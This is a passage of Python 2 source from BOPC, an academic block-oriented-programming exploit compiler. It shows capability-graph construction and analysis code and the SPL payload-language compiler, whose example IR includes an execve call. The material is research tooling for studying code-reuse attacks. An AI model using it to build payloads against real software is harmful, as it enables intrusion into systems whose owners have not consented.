        stmt_ctr = { 'regset' : 0, 'regmod' : 0, 'memrd' : 0, 'memwr' : 0, 'call' : 0, 'cond' : 0 }
        
        for _, data in self.__cap.nodes(data=True):
             stmt_ctr[ data['type'] ] += 1          # count statements


        emph("\t%s register assignments"   % bold(stmt_ctr['regset'], pad=5))
        emph("\t%s register modifications" % bold(stmt_ctr['regmod'], pad=5))
        emph("\t%s memory reads     "      % bold(stmt_ctr['memrd'], pad=5))
        emph("\t%s memory writes    "      % bold(stmt_ctr['memwr'], pad=5))
        emph("\t%s system/library calls"   % bold(stmt_ctr['call'], pad=5))
        emph("\t%s conditional jumps"      % bold(stmt_ctr['cond'], pad=5))


        # ---------------------------------------------------------------------
        # Add edges to the Capability Graph
        # ---------------------------------------------------------------------

        # don't calculate edges if asked (it's time consuming)
        if options & CAP_NO_EDGE:
            dbg_prnt(DBG_LVL_1, "Skipping edge calculation of capability graph.")
            return


        dbg_prnt(DBG_LVL_1, "Building the Capability Graph...")


        # list of node addresses
        node_list = [ d['addr'] for _, d in self.__cap.nodes_iter(data=True) ]    
        SPT       = nx.DiGraph()                    # create the Shortest Path Tree
        completed = 0                               # % completed

        csp = P._cfg_shortest_path(self.__cfg)      # create the CFG Shortest Path object


        warn("This can be a very slow process ('-dd' and '-ddd' options show a progress bar)")

        # for each node u_ in Capability Graph
        for u_, du in self.__cap.nodes_iter(data=True):            
            v_ = -1                                 # v_ is the uid of the target node (u_ -> v_)            

            SPT.clear()                             # clear Shortest Path Tree

            # Find the shortest paths (in CFG) to every other statement. Unfortunately, shortest
            # paths in CFG are not like regular shortest paths, as we explain in path.py. Thus we
            # have to re-calculate all shortest paths for every node in the capability graph.
            for length, path in csp.shortest_path(du['addr'], node_list):
                v_ += 1                             # the uid of the current node (it's linear)

                if length == INFINITY:
                    continue                        # skip nodes with non-existing paths

                # ---------------------------------------------------------------------------------
                # Now, if we directly add the edges with shortest path lengths to the capability
                # graph, we'll have an interesting problem: Consider the path A - x - x - B - x - C
                # in CFG. The Capability Graph should contain the edges (A, B, 3) and (B, C, 2). 
                # However the naive approach, will also add the edge (A, C, 5) to the graph. The
                # problem here is that we cannot accurately measure chains of statements due to the
                # direct edges.
                #
                # To fix this issue we build the Shortest Path Tree (SPT). That is, we merge all
                # shortest paths, into a single graph. The resulting graph will be tree as it
                # consists only of single source shortest paths (without loops), with all edges
                # having weight = 1. SPT has two types of nodes: Black and White. Black nodes 
                # contain statements (should appear on capability graph) while White nodes are used
                # for transitions. The first and the last nodes of each shortest path are Black
                # while every other node between is White. Our goal is to remove all White nodes
                # and merge the resulting SPT with the capability graph.
                #
                # We remove the White nodes one by one. When we remove a White node, we also update
                # the weights in SPT.
                # ---------------------------------------------------------------------------------
               
                # add first and last nodes (Black) to the SPT (if already exists, make them Black)
                SPT.add_nodes_from([path[0], path[-1]], color='Black')

                # keep track of the statement uids that use this node (map address to UID)
                SPT.node[path[0] ].setdefault('uid', set()).add(u_)
                SPT.node[path[-1]].setdefault('uid', set()).add(v_)

                # convert nodes [1,2,3,4], into edges [(1,2),(2,3),(3,4)] and add them to SPT
                SPT.add_edges_from(zip(path, path[1:]), weight=1)

                # color the intermediate nodes White (if they're not Black)
                for p in path[1:-1]:
                    if 'color' not in SPT.node[p] or SPT.node[p]['color'] != 'Black':
                         SPT.node[p]['color'] = 'White'


            # iteratively delete the White nodes
            for n in [node for node, data in SPT.nodes(data=True) if data['color'] == 'White']:

                # for each pair of (incoming, outgoing) edges
                for src, _, d1 in SPT.in_edges(n, data=True):
                    for _, dst, d2 in SPT.out_edges(n, data=True):
                        # add a new edge that bypasses the White node
                        SPT.add_edge(src, dst, weight=d1['weight']+d2['weight'])


                SPT.remove_node(n)                  # delete White node (along with its edges)


            ''' at this point, SPT will only contain Black nodes '''

            # merge SPT to the capability graph
            for e1, e2, data in SPT.edges_iter(data=True):
                # copy it edge-by-edge
                for u in SPT.node[e1]['uid']:       # move from addresses back to UIDs
                    for v in SPT.node[e2]['uid']:   
                        if u != v:                  # that's to avoid self-loops
                            self.__cap.add_edge(u, v, weight=data['weight'])
                            

            # show current progress (%)
            percent = math.floor(100. / len(self.__cap) * u_)
            if completed < percent:
                completed = percent            
                dbg_prnt(DBG_LVL_2, "%d%% completed" % completed)

        del SPT                                     # we don't need the SPT anymore

        dbg_prnt(DBG_LVL_1, "Done. Capability Graph generated successfully.")
      
        visualize(self.__cap)

     
        # ---------------------------------------------------------------------
        # Save Capability Graph to a file ?
        # ---------------------------------------------------------------------       
        if options & CAP_SAVE:
            dbg_prnt(DBG_LVL_1, "Saving Capability Graph...")

            try:
                nx.write_gpickle(self.__cap, self.__name + '.cap')
                dbg_prnt(DBG_LVL_1, "Done. Capability Graph saved as %s" % self.__name + '.cap')

            except IOError, err:
                error("Cannot save Capability Graph: %s" % str(err))


    # ---------------------------------------------------------------------------------------------
    # get(): Return the Capability Graph. Just in case ;)
    #
    # :Ret: The Capability Graph
    #
    def get( self ):
        return self.__cap


    # ---------------------------------------------------------------------------------------------
    # save(): Save the nodes of the Capability Graph (i.e., the interesting statements) to a file.
    #
    # :Ret: None.
    #
    def save( self ):
        now    = datetime.datetime.now()            # get current timestamp
        banner = textwrap.dedent("""\
            #
            # This file has been created by BOPC at %s
            # '%s' has %d interesting statements. Each line shows a statement.
            #
            # The columns are: address | type | register | value | mode | +W | operator | name
            # When an attribute is not available, a dot '.' is presented.
            #
            #
            # Attribute list:
            #
            #   address  : Address of the basic block tha contains the statement
            #   type     : Statement type: regset / regmod / call / cond
            #   register : Register name (for regset / regmod / cond)
            #   memory   : Memory address (for memrd / memwr)
            #   value    : Statement's value (for regset / regmod / cond)
            #   mode     : Statement mode (const / deref for regset and syscall / libcall for call)
            #   +W       : A flag indicating whether "val" points to a writable address (for regset)
            #   operator : Statement operator (for regmod / cond)
            #   name     : Function name (for call)
            #
        """ % (now.strftime("%d/%m/%Y %H:%M"), self.__name, self.__cap.order()))


        dbg_prnt(DBG_LVL_1, "Dumping interesting statments to a file...")    
         
        try:    
            cap = open(self.__name + '.stmt', 'w')

            cap.write(banner)                       # write banner first

            # write statements one by one
            for _, d in self.__cap.nodes_iter(data=True):                  
                opt  = '%10s'   % (d['reg']  if 'reg'  in d else '.')
                opt += '%10s'   % (d['mem']  if 'mem'  in d else '.')
                opt += ' %32s ' % (d['val']  if 'val'  in d else '.')
                opt += '%10s'   % (d['mode'] if 'mode' in d else '.')
                opt += '%10s'   % (d['+W']   if '+W'   in d else '.')
                opt += '%10s'   % (d['op']   if 'op'   in d else '.')
                opt += '%16s'   % (d['name'] if 'name' in d else '.')
                opt += '%10s'   % (d['size'] if 'size' in d else '.')

                cap.write( "0x%08x %10s %s\n" % (d['addr'], d['type'], opt) )
                       
            cap.close()
           
            dbg_prnt(DBG_LVL_1, "Done. Capability Graph saved as %s" % self.__name + '.stmt')

        except IOError, err:
            error("Cannot create statements file: %s" % str(err))


    # ---------------------------------------------------------------------------------------------
    # explore(): Explore the Capability Graph and look for "islands".
    #    
    # :Ret: None.
    #
    def explore( self ):        
        dbg_prnt(DBG_LVL_1, "Exploring the Capability Graph...")

        self.__islands = []                         # store islands here
        n_inslands     = 0                          # number of islands
        size, diam     = [], []                     # size and diameter lists
        

        # ---------------------------------------------------------------------
        # The first step is to extract the "islands" from the Capability Graph,
        # which are essentially the Strong Connected Components (SCC) of the
        # undirected version of the graph.
        # ---------------------------------------------------------------------
        capU      = self.__cap.to_undirected()      # make Capability Graph undirected
        unvisited = set(capU.nodes())               # initially, no node is visited

        while len(unvisited):                       # while there are unvisited nodes
            root = unvisited.pop()                  # pick a random node
            unvisited.add( root )                   # and remove it from set
            
            nodeset = []                            # nodes in the current island

            # explore the island using DFS and obtain the node set
            for u in nx.dfs_preorder_nodes(capU, root):            
                unvisited.remove(u)                 # mark u as visited
                nodeset.append(u)                   # and add it to node set

                self.__cap.node[ u ]['island'] = n_inslands
            

            # get island as induced (directed) subgraph and relabel nodes in [0, order(G)-1] range
            graph   = self.__cap.subgraph(nodeset)    
            relabel = dict(zip(graph.nodes(), range(graph.order())))
            graph   = nx.relabel_nodes(graph, relabel)
            

            # ---------------------------------------------------------------------
            # Calculate island's diameter. Although the island is fully connected
            # in the undirected version, it's not in the directed version. Thus,
            # nx.diameter(graph) throws an exception. The diameter of the island,
            # is the longest shortest path between any two nodes.
            # ---------------------------------------------------------------------
            D = 0                                   # island's diameter

            for n in graph.nodes_iter():
                # caclulate all shortest paths from the given node
                length = nx.single_source_shortest_path_length(graph, n)
                maxlen = max(length.values())       # get the longest shortest path

                if D < maxlen: D = maxlen           # keep track of the longest among all nodes


            size.append(len(nodeset))               # island size
            diam.append( D)                         # island's diameter

            self.__islands.append( {                # store island's information
                'root'     : root,
                'size'     : graph.order(),
                'diameter' : D,
                'graph'    : graph
            } )
   
            n_inslands += 1                         # total # islands

        dbg_prnt(DBG_LVL_1, "Done.")


        # ---------------------------------------------------------------------
        # Show some statistics
        # ---------------------------------------------------------------------      
        warn("'-dd' and '-ddd' options show the 'size' and 'diameter' lists")

        emph("Capability Graph has %s islands" % bold(n_inslands))

        emph("Island sizes: max = %s, min = %s, avg = %s" % 
            (bold(max(size)), bold(min(size)), bold(1.*sum(size)/n_inslands, 'float')))

        dbg_arb(DBG_LVL_2, "Island size list", size)

        emph("Island diameters: max = %s, min = %s, avg = %s" % 
            (bold(max(diam)), bold(min(diam)), bold(1.*sum(diam)/n_inslands, 'float')))

        dbg_arb(DBG_LVL_2, "Island diameter list", diam)


    # ---------------------------------------------------------------------------------------------
    # analyze(): Perform various analyses to the islands of the Capability Graph.
    #
    # :Arg analyses: The analyses to perform (can be many)
    # :Ret: None.
    #
    def analyze( self, *analyses ):
        dbg_prnt(DBG_LVL_1, "Analyzing the Capability Graph...")

        for analysis in analyses:                   # for every different analysis
            try:
                # based on the analysis, select the appropriate function and invoke it
                func = {
                    CAP_STMT_COMB_CTR : self.__analyze_stmt_comb_ctr,
                    CAP_STMT_MIN_DIST : self.__analyze_stmt_min_dist,
                    CAP_LOOPS         : self.__analyze_loops
                }[ analysis ]


                for island in self.__islands:       # perform the analysis to every island
                    func( island['graph'] )

            except KeyError, err:
                fatal('Unknow analysis %s' % str(err))


    # ---------------------------------------------------------------------------------------------
    # analyze_island(): Analyze a specific island.
    #
    # :Arg addr: An address of any node of the island
    # :Arg analyses: The analyses to perform (can be many)
    # :Ret: None.
    #
    def analyze_island( self, addr, *analyses ):
        # ---------------------------------------------------------------------
        # Search for the island to analyze
        # ---------------------------------------------------------------------
        island_id = -1

        for _, d in self.__cap.nodes_iter(data=True):
            if d['addr'] == addr:
                island_id = d['island']
                break

        if island_id < 0:
            fatal("Node '0x%x' does not contained in any island" % addr)

        dbg_prnt(DBG_LVL_1, "Analyzing the Island %d..." % island_id)


        # ---------------------------------------------------------------------
        # Perform the analyses
        # ---------------------------------------------------------------------
        for analysis in analyses:                   # for every different analysis
            try:
                # based on the analysis, select the appropriate function and invoke it
                func = {
                    CAP_STMT_COMB_CTR : self.__analyze_stmt_comb_ctr,
                    CAP_STMT_MIN_DIST : self.__analyze_stmt_min_dist,
                    CAP_LOOPS         : self.__analyze_loops
                }[ analysis ]

                func( self.__islands[ island_id ]['graph'] )

            except KeyError, err:
                fatal('Unknow analysis %s' % str(err))


    # ---------------------------------------------------------------------------------------------
    # callback(): Invoke a callback function for every island.
    #
    # :Arg cbfunc: The callback function to invoke
    # :Ret: None.
    #
    def callback( self, cbfunc ):
        for island in self.__islands:
            cbfunc( island['graph'] )

    
    # TODO: Move these to private function sections


    # ---------------------------------------------------------------------------------------------
    # __analyze_stmt_comb_ctr(): Count the total number of combinations that K SPL statements can
    #       be chained together (repetitions of statements are allowed) on a given island.
    #    
    # :Arg island: The island graph to work on
    # :Ret: None.
    #
    def __analyze_stmt_comb_ctr( self, island ):
        dbg_prnt(DBG_LVL_1, "Starting Analysis: Statement Combinations...")


        # TODO: Check this again. Too many combinations :\
        K = 20


        # ---------------------------------------------------------------------
        # Find the total number of paths between any 2 nodes that use exactly
        # K edges. We calculate that using Dynamic Programming. Let C^k_{ij} be
        # the total number of paths from i to j with exactly k edges. Then we
        # have:
        #
        #              C^0_{ii} = 1, forall i in V
        #   C^k_{ij} = C^1_{ij} = 1, iff (i,j) in E
        #              C^k_{ij} = SUM(C^{k-1}_[xj]),  for all x adjacent to i
        #
        # We build this table in a bottom-up fashion. Time/Space Complexity is 
        # O(|V|^2 * K). We can improve space complexity by storing only the
        # last 2 K's (K and K-1).
        # ---------------------------------------------------------------------
        C = numpy.zeros((K, island.order(), island.order()), dtype=numpy.int64)
        
        for i in range(island.order()):             # initialize for K = 0
            C[0][i][i] = 1
        
        for i,j, d in island.edges_iter(data=True): # initialize for K = 1
            C[1][i][j] = 1
        
        for k in range(2, K):                       # main loop
            for i in island.nodes():
                for j in island.nodes():
                    for x in island.neighbors(i):
                        C[k][i][j] += C[k-1][x][j]

        # ---------------------------------------------------------------------
        for k in range(K):
            dbg_arb(DBG_LVL_1, "Combinations with up to %d statements:", sum(sum(C[k][:][:])))


    # ---------------------------------------------------------------------------------------------
    # __analyze_stmt_min_dist(): Calculate the minimum distance with between any two statements
    #       that have exactly K edges between on a given island.
    #
    # :Arg island: The island graph to work on
    # :Ret: None.
    #
    def __analyze_stmt_min_dist( self, island ):
        '''
        B = { }

        # enumerate all simple paths from i to j 
        # WARNING: O(n!) complexity !!!
        for i in island.nodes_iter():
            for j in island.nodes_iter():
                if i == j: continue

                for x in nx.all_simple_paths(island, i, j):
 
                    A = [island[a][b]['weight'] for a,b in zip(x, x[1:])]

                    B.setdefault(len(x), []).append(sum(A))
        '''


        dbg_prnt(DBG_LVL_1, "Starting Analysis: Statement Minimum Distances...")


        K = 20

        # ---------------------------------------------------------------------
        # Find the minimum distance between any 2 nodes that use exactly K edges.
        # This is very similar with the algorithm in __analyze_stmt_comb_ctr(),
        # but with different Dynamic Programming equations:
        #
        #              M^0_{ii} = 0, forall i in V
        #   M^k_{ij} = M^1_{ij} = weight[i][j], iff (i,j) in E
        #              M^k_{ij} = MIN(M^k_[ij], weight[i][x] + M^{k-1}_{xj}), 
        #                                              for all x adjacent to i
        # ---------------------------------------------------------------------
        M = numpy.full((K, island.order(), island.order()), dtype=numpy.int32, fill_value=INFINITY)
        

        for i in range(island.order()):             # initialize for K = 0
            M[0][i][i] = 0
        
        for i,j, d in island.edges_iter(data=True): # initialize for K = 1
            M[1][i][j] = d['weight']
        
        for k in range(2, K):                       # main loop
            for i in island.nodes():
                for j in island.nodes():
                    for x in island.neighbors(i):                        

                        M[k][i][j] = min(M[k][i][j], island[i][x]['weight'] + M[k-1][x][j])

        # ---------------------------------------------------------------------
        for k in range(K):
            m = numpy.min(M[k][:][:])            
            if m == INFINITY: break

            dbg_prnt(DBG_LVL_1, "Min shortest path with up to %d statements: %d" % (k, m))


    # ---------------------------------------------------------------------------------------------
    # __analyze_loops(): Analyze the loops on an a given island.
    #    
    # :Arg island: The island graph to work on
    # :Ret: None.
    #
    def __analyze_loops( self, island ):
        warn('Loop analysis is not supported yet')
       

# -------------------------------------------------------------------------------------------------


================================================
FILE: source/compile.py
================================================
#!/usr/bin/env python2
# -------------------------------------------------------------------------------------------------
#
#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  
#   dP"""88""""""Y8, ,d8P""d8P"Y8b,   dP"""88""""""Y8,  ,88"""Y8b,
#   Yb,  88      `8b,d8'   Y8   "8b,dPYb,  88      `8b d8"     `Y8
#    `"  88      ,8Pd8'    `Ybaaad88P' `"  88      ,8Pd8'   8b  d8
#        88aaaad8P" 8P       `""""Y8       88aaaad8P",8I    "Y88P'
#        88""""Y8ba 8b            d8       88"""""   I8'          
#        88      `8bY8,          ,8P       88        d8           
#        88      ,8P`Y8,        ,8P'       88        Y8,          
#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, 
#       88888888P"     `"Y8888P"'          88          `"Y8888888 
#
#   The Block Oriented Programming (BOP) Compiler - v2.1
#
#
# Kyriakos Ispoglou (ispo) - ispo@purdue.edu
# PURDUE University, Fall 2016-18
# -------------------------------------------------------------------------------------------------
#
#
# compile.py:
#
# This module compiles an program written in SPL into an equivalent Intermediate Representation
# (IR) suitable for processing by subsequent modules. Please do not confuse it with the VEX IR.
#
# SPL is actually a subset of C, so it has the same syntax. Comments are denoted with '//'. Multi
# line comments are not supported.The specs of the language (expressed in EBNF) are shown below:
#
#       <SPL>    := 'void' 'payload' '(' ')' '{' <stmts> '}'
#       <stmts>  := ( <stmt> | <label> )* <return>?
#       <stmt>   := <varset> | <regset> | <regmod> | <memrd> | <memwr> | <call> | <cond> | <jump>
#
#       <varset> := 'int' <var> '=' <rvalue> ';'
#                 | 'int' <var> '=' '{'  <rvalue> (',' <rvalue>)* ';'
#                 | 'string' <var> '=' <str> ';'
#       <regset> := <reg> '=' <rvalue> ';'
#       <regmod> := <reg> <asgop> <number> ';'
#       <memrd>  := <reg> '=' '*' <reg> ';'
#       <memwr>  := '*' <reg> '=' <reg> ';'
#       <call>   := <var> '(' (e | <reg> (',' <reg>)*) ')'
#       <label>  := <var> ':'
#       <cond>   := 'if' '(' <reg> <cmpop> <number> ')' 'goto' <var> ';'
#       <jump>   := 'goto' <var> ';'
#       <return> := 'return' <number> ';'
#
#       <reg>    := '__r' <regid>
#       <regid>  := [0-7]
#       <var>    := [a-zA-Z_][a-zA-Z_0-9]*
#       <number> := ('+' | '-') [0-9]+ | '0x' [0-9a-fA-F]+
#       <rvalue> := <number> | '&' <var>
#       <str>    := '"' [.]* '"'
#       <asgop>  := '+=' | '-=' | '*=' | '/=' | '&=' | '|=' | '~=' | '^=' | '>>=' | '<<='
#       <cmpop>  := '==' | '!=' | '>' | '>=' | '<' | '<='
#
#
# Here's how the IR looks like:
#
#   {'uid': 2, 'type': 'regset', 'reg': 0, 'valty': 'num', 'val': -10}
#   {'uid': 6, 'type': 'varset', 'name': 'test', 'val': ['a1']}
#   {'uid': 10,'type': 'varset', 'name': 'bar',
#                           'val': ['\xd2\x04\x00\x00\x00\x00\x00\x00', ('foo',), ('test',)]}
#   {'uid': 12, 'type': 'regset', 'reg': 6, 'valty': 'var', 'val': ('bar',)}
#   {'uid': 18, 'type': 'regmod', 'reg': 6, 'op': '+', 'val': 17712}
#   {'uid': 6,  'type': 'memrd', 'reg': 0, 'mem': 1}
#   {'uid': 8,  'type': 'memwr', 'mem': 0, 'val': 1}
#   {'uid': 20, 'type': 'label'}
#   {'uid': 24, 'type': 'call', 'name': 'execve', 'args': [0, 1, 6], 'dirty': ['rax', 'rcx', 'rdx']}
#   {'uid': 30, 'type': 'cond', 'reg': 0, 'op': '==' 'num': 11, 'target': '@__26'}
#   {'uid': 32, 'type': 'jump', 'target': '@__20'}
#   {'uid': 34, 'type': 'return', 'target': 0xdead}
#
# NOTE: The compiler is implemented using regular expressions, and not using flex/bison, as it's
#   too simple. So, be careful about the language syntax, as very small differences (that may not
#   affect other languages) can result in syntax errors.
#
#
# * * * ---===== TODO list =====--- * * *
#
#   [1]. Consider the control flow of the SPL program upon "Semantic check #4".
#
# -------------------------------------------------------------------------------------------------
from coreutils import *
from calls     import *

import struct
import shlex
import re


# ------------------------------------------------------------------------------------------------
# Constant Definitions
# ------------------------------------------------------------------------------------------------
N_VIRTUAL_REGISTERS = 8                             # number of virtual registers

STATE_IDLE          = 0                             # program is in idle state
STATE_START         = 1                             # state after we encounter !PROGRAM START
STATE_END           = 2                             # state after we encounter !PROGRAM END

# tokens come in tuples (symbol, lineno). To make code easier to read, don't use 0 and 1 to
# access them, but instead use T and L
T = 0
L = 1

# Instead of incrementing pc and uid by one, we can increment them by two (or by larger intervals).
# This has to do with optimization. If we want to "inject" a new statement, we can do that without
# modifying the pc/uid of the other statements.
_STEP_UP = 2                                        # 2 is ok for current optimizer


# WARNING: Don't try to use modulo operator ;)
asg_ops = ['+=', '-=', '*=', '/=', '&=', '|=', '^=', '~=', '>>=', '<<=']
cmp_ops = ['==', '!=', '>',  '>=', '<',  '<=']


# The regular expressions to match various tokens
_reg_    = r'^__r[0-7]$'
_var_    = r'^[a-zA-Z_][a-zA-Z_0-9]*$'
_number_ = r'^(((\+|\-)?[0-9]+)|(0x[0-9a-fA-F]+))$'
_rvalue_ = r'^(((\+|\-)?[0-9]+)|(0x[0-9a-fA-F]+)|(\&[a-zA-Z_][a-zA-Z_0-9]*))$'
_asgop_  = r'^\+=|\-=|\*=|\/=|\&=|\|=|\^=|\~=|\>\>=|\<\<=$'
_cmpop_  = r'^\=\=|\!\=|\>|\>\=|\<|\<\=$'


# -------------------------------------------------------------------------------------------------
# compile: This is the main class that compiles an SPL program into its equivalent IR form.
#
class compile( object ):
    ''' ======================================================================================= '''
    '''                                   INTERNAL VARIABLES                                    '''
    ''' ======================================================================================= '''
    __prog          = ''                            # program's file name
    __state         = STATE_IDLE                    # program's state
    __lineno        = 1                             # current line number for parsing
    __pc            = START_PC                      # program counter (initialized)
    __uid           = 0                             # IR unique identifier
    __label_dict    = { }                           # label lookup
    __vartab        = { }                           # variable table
    __ir            = [ ]                           # intermediate list


    ''' ======================================================================================= '''
    '''                                   AUXILIARY FUNCTIONS                                   '''
    ''' ======================================================================================= '''

    # ---------------------------------------------------------------------------------------------
    # __syn_err(): A syntax error is fatal. Print a verbose explanation and halt execution.
    #
    # :Arg err: Error to display
    # :Ret: None.
    #
    def __syn_err( self, err, lineno ):
        fatal("%s:%d : Syntax Error: %s" % (self.__prog, lineno, err))


    # ---------------------------------------------------------------------------------------------
    # __sem_err(): A semantic error is fatal as well. Print a verbose explanation and halt
    #       execution.
    #
    # :Arg err: Error to display
    # :Ret: None.
    #
    def __sem_err( self, err ):
        fatal("%s : Semantic Error: %s" % (self.__prog, err))


    # ---------------------------------------------------------------------------------------------
    # __sem_warn(): A semantic warning isn't fatal, but it's still important. Print a verbose
    #       explanation and continue execution.
    #
    # :Arg err: Error to display
    # :Ret: None.
    #
    def __sem_warn( self, msg ):
        warn("%s : Semantic Warning: %s" % (self.__prog, msg))


    # ---------------------------------------------------------------------------------------------
    # __multi_re(): Extend regular expression matching to lists. Instead of applying 1 regex in a
    #       single string, __multi_re() applies a list of regexes in a list of strings. A list of
    #       errors is also supplied in case that a regex fails.
    #
    # :Arg stmt: List of statements to match
    # :Arg regex: List of regular expressions for statements
    # :Arg err: List of errors in case of a mismatch
    # :Ret: None.
    #
    def __multi_re( self, stmt, regex, err ):
        stmt, lno = zip(*stmt)

        if len(stmt) != len(regex):                 # check if parameters match
            self.__syn_err( "Invalid number of parameters", lno[0] )

        for i in range(len(stmt)):                  # for each string in list
            try:
                if not re.match(regex[i], stmt[i]): # apply regex
                    self.__syn_err("%s '%s'" % (err[i], stmt[i]), lno[i])
            except IndexError: pass


    # ---------------------------------------------------------------------------------------------
    # __ir_add(): Add a "compiled" statement to IR.
    #
    # :Arg tup: A tuple containing the statement
    # :Ret: None.
    #
    def __ir_add( self, tup ):
        # extend statement and add it to IR (along with its pc)
        self.__ir.append( ['@__' + str(self.__pc), dict([('uid',self.__uid)] + tup.items())] )

        # __pc and __uid are equal for now, but they're going be different after optimization.
        self.__pc  = self.__pc  + _STEP_UP          # increase program counter
        self.__uid = self.__uid + _STEP_UP          # assign a unique id to each statement


    # ---------------------------------------------------------------------------------------------

    ''' ======================================================================================= '''
    '''                                     SYNTAX ANALYSIS                                     '''
    ''' ======================================================================================= '''

    # ---------------------------------------------------------------------------------------------
    # __check_prog_state(): A decorator function (== hook) that is called before every statement
    #       parsing and verifies that all statements are inside payload() declaration.
    #
    # :Arg func: Function to invoke from decorator
    # :Ret: Decorator function.
    #
    def __check_prog_state( func ):
        def stmt_intrl( self, stmt ):
            dbg_prnt(DBG_LVL_3, "Parsing statement: " + ' '.join(zip(*stmt)[0]))

            if self.__state != STATE_START:
                self.__syn_err("Statement outside of !PROGRAM directives")

            func(self, stmt)                        # invoke the appropriate statement function

        return stmt_intrl                           # return decorator


    # ---------------------------------------------------------------------------------------------
    # __stmt_program(): A payload declaration has been encountered.
    #
    # :Arg stmt: Statement to process
    # :Ret: None.
    #
    def __stmt_program( self, stmt ):
        if self.__state == STATE_IDLE:
            # we haven't declare payload() yet. Make sure that declaration is "void payload() {"
            if len(stmt) != 5:
                self.__syn_err("Invalid number of aaa operands", stmt[0][L])

            self.__multi_re(stmt,
                [r'^void$', r'^payload$', r'^\($', r'^\)$', r'^\{$'],
                ["Invalid function declaration"]*5
            )

            self.__state = STATE_START              # change state

            # A pseudo-statement to avoid corner cases (needed for building the delta graph)
            self.__ir_add( {'type':'entry'} )


        elif self.__state == STATE_START:
            # we're looking to close payload() declaration ("}")
            if len(stmt) != 1:
                self.__syn_err("Code outside of function!", stmt[1][L])

            self.__multi_re(stmt, [r'^}$'],["Unknown"] )

            self.__state = STATE_END                # change state


        else:
            self.__syn_err("Invalid program state")


    # ---------------------------------------------------------------------------------------------
    # __stmt_var(): A variable assignment has been encountered.
    #
    # :Arg stmt: Statement to process
    # :Ret: None.
    #
    @__check_prog_state
    def __stmt_var( self, stmt ):
        # stmt[0] has already been checked. Some checks are redundant here, but we do them to keep
        # functions autonomous.

        # ---------------------------------------------------------------------
        if re.search(r'^string$', stmt[0][T]):
            # start with the easy one
            self.__multi_re( stmt[1:],
                [_var_, r'^=$', r'^".*"$',],
                ["Invalid variable name", "Expected '=', but found", "Invalid assigned value"]
            )

            val = [stmt[3][T][1:-1].decode('string_escape')]

        # ---------------------------------------------------------------------
        elif re.search(r'^int$', stmt[0][T]):
            self.__multi_re( stmt[1:3],
                [_var_, r'^=$'],
                ["Invalid variable name", "Expected '=', but found"]
            )

            try:
                if re.search(_rvalue_, stmt[3][T]): # single R-value

                    if stmt[3][T][0] == '&':
                        val = [(stmt[3][T][1:],)]
                    else:
                        val = [struct.pack('<Q', int(stmt[3][T], 0))]

                else:                               # array of R-values
                    val = []

                    self.__multi_re( [stmt[3]] + [stmt[4]] + [stmt[-1]],
                        [r'^\{$', _rvalue_, r'^\}$'],
                        ["Expected '{', but found", "Invalid R-value", "Expected '}', but found"]
                    )

                    if stmt[4][T][0] == '&':
                        val.append( (stmt[4][T][1:],) )
                    else:
                        val.append(struct.pack('<Q', int(stmt[4][T], 0)))

                    # parse all R-values
                    for i in range(5, len(stmt)-1, 2):
                        self.__multi_re( [stmt[i]] + [stmt[i+1]],
                            [r'^,$', _rvalue_],
                            ["Expected ',', but found", "Invalid R-value" ]
                        )

                        if stmt[i+1][T][0] == '&':
                            val.append( (stmt[i+1][T][1:],) )
                        else:
                            val.append(struct.pack('<Q', int(stmt[i+1][T], 0)))

            except IndexError:
                self.__syn_err("Invalid number of arguments", stmt[0][L])

        # ---------------------------------------------------------------------
        else:
            self.__syn_err("Invalid type", stmt[0][L])


        # ---------------------------------------------------------------------
        # This is a semantic check, but it's better to do it here
        # ---------------------------------------------------------------------
        if stmt[1][T] in self.__vartab:             # check if variable has already been declared
            self.__sem_err("Redeclaration of '%s'" % stmt[1][T])

        self.__vartab[ stmt[1][T] ] = val           # if not, add variable to vartab

        # add statement to IR
        self.__ir_add( {'type':'varset', 'name':stmt[1][T], 'val':val} )


    # ---------------------------------------------------------------------------------------------
    # __stmt_reg(): A register assignment/modification or a memory read has been encountered.
    #
    # :Arg stmt: Statement to process
    # :Ret: None.
    #
    @__check_prog_state
    def __stmt_reg( self, stmt ):
        self.__multi_re( [stmt[0]], [_reg_], ["Invalid register name"])


        # ---------------------------------------------------------------------
        # Memory read
        # ---------------------------------------------------------------------
        if re.search(r'^=$', stmt[1][T]) and re.search(r'^\*$', stmt[2][T]) and len(stmt) == 4:
            self.__multi_re( [stmt[3]], [_reg_], ["Invalid R-value"])

            self.__ir_add({'type':'memrd', 'reg':int(stmt[0][T][3],0), 'mem':int(stmt[3][T][3],0)})


        # ---------------------------------------------------------------------
        # Register assignment
        # ---------------------------------------------------------------------
        elif re.search(r'^=$', stmt[1][T]) and len(stmt) == 3:
            self.__multi_re( [stmt[2]], [_rvalue_], ["Invalid R-value"])

            if stmt[2][T][0] == '&':
                self.__ir_add( {'type'  : 'regset',
                                'reg'   : int(stmt[0][T][3]),
                                'valty' : 'var',
                                'val'   : (stmt[2][T][1:],)} )

            else:
                self.__ir_add( {'type'  : 'regset',
                                'reg'   : int(stmt[0][T][3]),
                                'valty' : 'num',
                                'val'   : int(stmt[2][T], 0)} )


        # ---------------------------------------------------------------------
        # Register modification
        # ---------------------------------------------------------------------
        elif re.search(_asgop_, stmt[1][T]) and len(stmt) == 3:
            self.__multi_re( [stmt[2]], [_number_], ["Invalid number"])


            self.__ir_add( {'type': 'regmod',
                            'reg' : int(stmt[0][T][3]),
                            'op'  : stmt[1][T][:-1],
                            'val' : int(stmt[2][T], 0)} )

        # ---------------------------------------------------------------------
        # Unknown register operation
        # ---------------------------------------------------------------------
        else:
            self.__syn_err("Unknown operator '%s'" % stmt[1][T], stmt[1][L])


    # ---------------------------------------------------------------------------------------------
    # __stmt_memwr(): An memory write statement has been encountered.
    #
    # :Arg stmt: Statement to process
    # :Ret: None.
    #
    @__check_prog_state
    def __stmt_memwr( self, stmt ):
        self.__multi_re( stmt,
            [r'^\*$', _reg_, r'^=$', _reg_],
            ["Expected '*', but found", "Invalid register name", "Expected '=', but found",
             "Invalid register name"]
        )

        self.__ir_add( {'type':'memwr', 'mem':int(stmt[1][T][3],0), 'val':int(stmt[3][T][3],0)} )


    # ---------------------------------------------------------------------------------------------
    # __stmt_call(). A library/system call has been encountered.
    #
    # :Arg stmt: Statement to process
    # :Ret: None.
    #
    @__check_prog_state
    def __stmt_call( self, stmt ):
        call = find_call(stmt[0][T])

        if not call:
